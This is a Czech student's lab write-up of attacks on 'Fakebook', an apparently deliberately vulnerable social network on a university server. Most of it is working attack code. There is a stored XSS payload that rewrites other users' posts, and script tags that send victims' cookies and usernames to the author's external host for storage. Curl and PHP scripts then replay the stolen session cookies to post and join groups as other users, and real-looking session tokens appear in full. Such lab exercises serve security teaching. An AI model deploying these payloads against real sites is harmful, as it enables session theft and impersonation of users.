1) Vytvořil jsem si uživatele "Frodo".

--------------------------------------
2) XSS na přepisování zpráv:
Najde zprávu jako item feedu a přidá k ní další obsah.

Můj příspěvek:

Prepisuju zpravu.
<script> window.onload = function(){document .getElementById("js_item_feed_576") .children[2] .children[0] .children[1] .innerHTML += " novy dospany text"} </script>

--------------------------------------
3) curl příkaz na posílání příspěvků na mojí zed:

curl 'http://boura.fit.cvut.cz/fakebook/static/ajax.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://boura.fit.cvut.cz' -H 'Connection: keep-alive' -H 'Referer: http://boura.fit.cvut.cz/fakebook/index.php?do=/profile-38/' -H 'Cookie: cored889user_id=38; cored889user_hash=0e040bcd561e67f4a5ed1f796e87a6ab2f08bda0fb8b72edd9; PHPSESSID=h0hr5d622dffrhhc8i6chmks0a; cored889visit=1683975614; cored889last_login=1683978265' --data-raw '&core[ajax]=true&core[call]=user.updateStatus&core[security_token]=b6ca8fa843bb30706a4d3207609147da&val[user_status]=poslane skrze curl&val[group_id]=&val[action]=upload_photo_via_share&image[]=&val[link][url]=http%3A%2F%2F&val[status_info]=&val[connection][facebook]=0&val[connection][twitter]=0&val[privacy]=0&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=38'

--------------------------------------
4) Stored XSS na odchytávání cookies:

Vytvořil jsem si web bek.euweb.cz

Na webovém serveru je připraven .php script, který ukládá cookies z argumentu a zobrazuje za to obrázek.

Získaná cookies ukládá server do MySQL databáze spolu s id uživatele a jeho username.

Rozhodl jsem se ukládat všechna cookies, tj víc cookies jednoho uživatele. Pouze kontroluji, zda už konkrétní cookie je v databázi. Možná by stačilo ukládat pouze jedno cookie na uživatele (user id) a to za předpokladu, že budou mít dlouhou (nekonečnou) platnost.


Na Fakebooku je/byl následující příspěvěk, který krade cookies, posílá je na můj server a naoplátku ukazuje obrázek. Také poílá jméno uživatele ze záhlaví Fakebooku. Skript na serveru si nakonec z cookie vytáhne ještě id uživatele.

<script> document.writeln(decodeURI("%3C")+"img src=\"http://bek.euweb.cz/index.php?u="+trim(document. getElementById("header_menu_user_profile").innerText)+ "&c="+document.cookie+"\""+decodeURI("%3E")) </script>

55 znaku bez mezery
200 znaku a pak se schovava

<script> document.writeln(decodeURI("%3C")+"img src=\"http://bek.euweb.cz/index.php?u=" +"user"+ "&c="+encodeURIComponent (document.cookie)+"\""+decodeURI("%3E")) </script>

<script>document.writeln(decodeURI("%3C")+"img src=\"http://bek.euweb.cz/i?u="+encodeURIComponent(document.getElementById("header_menu_user_profile"))+"&c="+encodeURIComponent(document.cookie) +"\""+decodeURI("%3E"))</script>
--------------------------------------
5) Curl pro poslání zprávy za někoho jiného:

Takto vypadá shellovské curl (zformátované):

curl 'http://boura.fit.cvut.cz/fakebook/static/ajax.php'
-X POST
-H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0'
-H 'Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01'
-H 'Accept-Language: en-US,en;q=0.5'
-H 'Accept-Encoding: gzip, deflate'
-H 'Content-Type: application/x-www-form-urlencoded'
-H 'X-Requested-With: XMLHttpRequest'
-H 'Origin: http://boura.fit.cvut.cz'
-H 'Connection: keep-alive'
-H 'Referer: http://boura.fit.cvut.cz/fakebook/index.php?do=/profile-41/'
-H 'Cookie: PHPSESSID=h0hr5d622dffrhhc8i6chmks0a; cored889visit=1683975614; cored889last_login=1684013068; cored889user_id=41; cored889user_hash=08b7ac63a600b4a99b05bb97f4e597b4016b2559e1d089c7ac'
--data-raw '&core[ajax]=true&core[call]=user.updateStatus&core[security_token]=b6ca8fa843bb30706a4d3207609147da&val[user_status]=poslane skrze curl&val[group_id]=&val[action]=upload_photo_via_share&image[]=&val[link][url]=http%3A%2F%2F&val[status_info]=&val[connection][facebook]=0&val[connection][twitter]=0&val[privacy]=0&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=41'

Takto pak jeho parametrizovaná php verze:

// Generated by curl-to-PHP: http://incarnate.github.io/curl-to-php/
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, 'http://boura.fit.cvut.cz/fakebook/static/ajax.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "&core[ajax]=true&core[call]=user.updateStatus&core[security_token]=b6ca8fa843bb30706a4d3207609147da&val[user_status]=poslane skrze curl z webu&val[group_id]=&val[action]=upload_photo_via_share&image[]=&val[link][url]=http%3A%2F%2F&val[status_info]=&val[connection][facebook]=0&val[connection][twitter]=0&val[privacy]=0&core[is_admincp]=0&core[is_user_profile]=1&core[profile_user_id]=" . $id);

$headers = array();
$headers[] = 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0';
$headers[] = 'Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01';
$headers[] = 'Accept-Language: en-US,en;q=0.5';
$headers[] = 'Accept-Encoding: gzip, deflate';
$headers[] = 'Content-Type: application/x-www-form-urlencoded';
$headers[] = 'X-Requested-With: XMLHttpRequest';
$headers[] = 'Origin: http://boura.fit.cvut.cz';
$headers[] = 'Connection: keep-alive';
$headers[] = 'Referer: http://boura.fit.cvut.cz/fakebook/index.php?do=/profile-' .$id . '/';
$headers[] = 'Cookie: ' . $cookie;
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);

$result = curl_exec($ch);

curl_close($ch);


Pro poslání příspěvku za cizího uživatele se dosadí $cookie v Cookie hlavičce a $id v Referer hlavičce a v CURLOPT_POSTFIELDS.

--------------------------------------
6]Přihlašování uživatelů do vlastní skupiny:

Založil jsem skupinu "7:30 ano".

Pro přihlášení uživatele funguje následující curl příkaz s cookie daného uživatele.

curl 'http://boura.fit.cvut.cz/fakebook/static/ajax.php' -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H 'Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H 'X-Requested-With: XMLHttpRequest' -H 'Origin: http://boura.fit.cvut.cz' -H 'Connection: keep-alive' -H 'Referer: http://boura.fit.cvut.cz/fakebook/index.php?do=/pages/11/' -H 'Cookie: PHPSESSID=h0hr5d622dffrhhc8i6chmks0a; cored889visit=1683975614; cored889last_login=1684013068; cored889user_id=41; cored889user_hash=08b7ac63a600b4a99b05bb97f4e597b4016b2559e1d089c7ac' --data-raw '&core[ajax]=true&core[call]=like.add&type_id=pages&item_id=11&core[security_token]=b6ca8fa843bb30706a4d3207609147da&core[is_admincp]=0&core[is_user_profile]=0&core[profile_user_id]=0'

V php skriptu mám připravený ještě curl příkaz, který bude uživatele přidávat do skupiny automaticky. Jelikož ale není Fakebook dostupný z internetu není možné příkaz použít.

--------------------------------------
Nakonec jsem si vytvořil ještě uživatele Bilbo, pro potvrzení ukradnutí cookie a následnou prací s ní.